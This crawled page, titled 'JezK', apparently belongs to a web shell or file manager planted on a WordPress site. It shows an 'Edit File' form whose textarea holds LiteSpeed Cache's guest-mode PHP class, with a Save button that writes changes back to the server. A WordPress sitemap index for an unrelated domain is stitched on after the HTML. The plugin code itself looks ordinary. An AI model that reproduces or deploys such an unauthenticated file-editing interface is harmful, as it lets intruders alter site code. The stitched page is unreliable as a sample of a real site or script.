
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: guest.cls.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Guest mode management class.
 *
 * Handles syncing of Guest Mode IP and UA lists from QUIC.cloud.
 *
 * @package LiteSpeed
 * @since   7.7
 */

namespace LiteSpeed;

defined( &#039;WPINC&#039; ) || exit();

/**
 * Class Guest
 *
 * Extends Cloud class to provide Guest Mode related functionality.
 */
class Guest extends Cloud {

	const LOG_TAG = &#039;👤&#039;;

	const TYPE_SYNC = &#039;sync&#039;;

	/**
	 * Cron handler for daily Guest Mode sync.
	 *
	 * @since 7.7
	 * @return void
	 */
	public static function cron() {
		self::debug( &#039;Cron: starting daily sync&#039; );
		self::cls()-&gt;sync_lists();
	}

	/**
	 * Sync Guest Mode IP and UA lists.
	 *
	 * Fetches the latest IP and UA lists from QUIC.cloud API and saves them locally.
	 *
	 * @since 7.7
	 * @return array{success: bool, message: string}
	 */
	public function sync_lists() {
		self::debug( &#039;Starting Guest Mode lists sync&#039; );

		$cloud_dir = LITESPEED_STATIC_DIR . &#039;/cloud&#039;;

		$results = [
			&#039;ips&#039; =&gt; false,
			&#039;uas&#039; =&gt; false,
		];

		foreach ( [ &#039;ips&#039;, &#039;uas&#039; ] as $type ) {
			$url  = $this-&gt;_cloud_server_wp . &#039;/gm_&#039; . $type;
			$file = $cloud_dir . &#039;/gm_&#039; . $type . &#039;.txt&#039;;
			self::debug( &#039;Fetching: &#039; . $url );
			$temp = File::download( $url, $file, 15 );
			if ( is_wp_error( $temp ) ) {
				self::debug( &#039;Fetch failed: &#039; . $temp-&gt;get_error_code() );
			} elseif ( File::publish_temp_file( $temp, $file ) ) {
				self::debug( &#039;Guest Mode &#039; . $type . &#039; synced&#039; );
				$results[ $type ] = true;
			}
		}

		$success = $results[&#039;ips&#039;] &amp;&amp; $results[&#039;uas&#039;];
		$message = $success
			? __( &#039;Guest Mode lists synced successfully.&#039;, &#039;litespeed-cache&#039; )
			: __( &#039;Failed to sync Guest Mode lists.&#039;, &#039;litespeed-cache&#039; );

		return [
			&#039;success&#039; =&gt; $success,
			&#039;message&#039; =&gt; $message,
		];
	}

	/**
	 * Handle all request actions from main class.
	 *
	 * @since 7.7
	 * @return void
	 */
	public function handler() {
		$type = Router::verify_type();

		switch ( $type ) {
			case self::TYPE_SYNC:
				$result = $this-&gt;sync_lists();
				if ( Router::is_ajax() ) {
					wp_send_json( $result );
				}
				if ( $result[&#039;success&#039;] ) {
					Admin_Display::success( $result[&#039;message&#039;] );
				} else {
					Admin_Display::error( $result[&#039;message&#039;] );
				}
				break;

			default:
				break;
		}

		Admin::redirect();
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
